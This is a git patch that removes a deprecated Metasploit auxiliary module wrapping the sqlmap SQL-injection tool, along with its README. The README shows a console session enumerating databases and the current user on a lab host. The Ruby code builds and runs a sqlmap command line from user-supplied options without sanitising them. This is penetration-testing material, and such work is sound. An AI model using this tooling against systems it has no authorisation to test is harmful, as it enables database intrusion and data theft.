From 4940610f3890ab00dc533e17dbd399f1410c271f Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 14 Jul 2012 19:27:31 +0100 Subject: [PATCH] removed deprecated metasploit module --- extra/msfauxmod/README.txt | 78 --------------------------- extra/msfauxmod/sqlmap.rb | 105 ------------------------------------- 2 files changed, 183 deletions(-) delete mode 100644 extra/msfauxmod/README.txt delete mode 100644 extra/msfauxmod/sqlmap.rb diff --git a/extra/msfauxmod/README.txt b/extra/msfauxmod/README.txt deleted file mode 100644 index 6ca799015..000000000 --- a/extra/msfauxmod/README.txt +++ /dev/null @@ -1,78 +0,0 @@ -To use Metasploit's sqlmap auxiliary module launch msfconsole and follow -the example below. - -Note that if you are willing to run Metasploit's sqlmap auxiliary module on -through WMAP framework you first need to install sqlmap on your system or -add its file system path to the PATH environment variable. - - -$ ./msfconsole - - _ _ _ _ - | | | | (_) | - _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ -| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| -| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ -|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| - | | - |_| - - - =[ msf v3.2-testing -+ -- --=[ 308 exploits - 173 payloads -+ -- --=[ 20 encoders - 6 nops - =[ 75 aux - -msf > use auxiliary/scanner/http/wmap_sqlmap -msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121 -RHOSTS => 192.168.1.121 -msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php -PATH => /sqlmap/mysql/get_int.php -msf auxiliary(wmap_sqlmap) > set QUERY id=1 -QUERY => id=1 -msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user' -OPTS => --dbs --current-user -msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -msf auxiliary(wmap_sqlmap) > show options - -Module options: - - Name Current Setting Required Description - ---- --------------- -------- ----------- - BATCH true yes Never ask for user input, use the default behaviour - BODY no The data string to be sent through POST - METHOD GET yes HTTP Method - OPTS --dbs --current-user no The sqlmap options to use - PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection - Proxies no Use a proxy chain - QUERY id=1 no HTTP GET query - RHOSTS 192.168.1.121 yes The target address range or CIDR identifier - RPORT 80 yes The target port - SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path - SSL false no Use SSL - THREADS 1 yes The number of concurrent threads - VHOST no HTTP server virtual host - -msf auxiliary(wmap_sqlmap) > run -[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch -SQLMAP: -SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. -SQLMAP: and Daniele Bellucci -SQLMAP: -SQLMAP: [*] starting at: 16:23:19 -SQLMAP: -SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic -SQLMAP: back-end DBMS: MySQL >= 5.0.0 -SQLMAP: -SQLMAP: current user: 'testuser@localhost' -SQLMAP: -SQLMAP: available databases [3]: -SQLMAP: [*] information_schema -SQLMAP: [*] mysql -SQLMAP: [*] test -SQLMAP: -SQLMAP: -SQLMAP: [*] shutting down at: 16:23:21 -SQLMAP: -[*] Auxiliary module execution completed -msf auxiliary(wmap_sqlmap) > diff --git a/extra/msfauxmod/sqlmap.rb b/extra/msfauxmod/sqlmap.rb deleted file mode 100644 index 38f8653a4..000000000 --- a/extra/msfauxmod/sqlmap.rb +++ /dev/null @@ -1,105 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::WMAPScanUniqueQuery - include Msf::Auxiliary::Scanner - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQLMAP SQL Injection External Module', - 'Description' => %q{ - This module launch a sqlmap session. - sqlmap is an automatic SQL injection tool developed in Python. - Its goal is to detect and take advantage of SQL injection - vulnerabilities on web applications. Once it detects one - or more SQL injections on the target host, the user can - choose among a variety of options to perform an extensive - back-end database management system fingerprint, retrieve - DBMS session user and database, enumerate users, password - hashes, privileges, databases, dump entire or user - specific DBMS tables/columns, run his own SQL SELECT - statement, read specific files on the file system and much - more. - }, - 'Author' => [ 'Bernardo Damele A. G. ' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision: 9212 $', - 'References' => - [ - ['URL', 'http://www.sqlmap.org'], - ] - )) - - register_options( - [ - OptString.new('METHOD', [ true, "HTTP Method", 'GET' ]), - OptString.new('PATH', [ true, "The path/file to test for SQL injection", 'index.php' ]), - OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]), - OptString.new('DATA', [ false, "The data string to be sent through POST", '' ]), - OptString.new('OPTS', [ false, "The sqlmap options to use", ' ' ]), - OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]), - OptBool.new('BATCH', [ true, "Never ask for user input, use the default behaviour", true ]) - ], self.class) - end - - # Modify to true if you have sqlmap installed. - def wmap_enabled - false - end - - # Test a single host - def run_host(ip) - - sqlmap = datastore['SQLMAP_PATH'] - - if not sqlmap - print_error("The sqlmap script could not be found") - return - end - - data = datastore['DATA'] - method = datastore['METHOD'].upcase - - sqlmap_url = (datastore['SSL'] ? "https" : "http") - sqlmap_url += "://" + wmap_target_host + ":" + wmap_target_port - sqlmap_url += "/" + datastore['PATH'] - - if method == "GET" - sqlmap_url += '?' + datastore['QUERY'] - end - - cmd = sqlmap + ' -u \'' + sqlmap_url + '\'' - cmd += ' --method ' + method - cmd += ' ' + datastore['OPTS'] - - if not data.empty? - cmd += ' --data \'' + data + '\'' - end - - if datastore['BATCH'] == true - cmd += ' --batch' - end - - print_status("exec: #{cmd}") - IO.popen( cmd ) do |io| - io.each_line do |line| - print_line("SQLMAP: " + line.strip) - end - end - end - -end -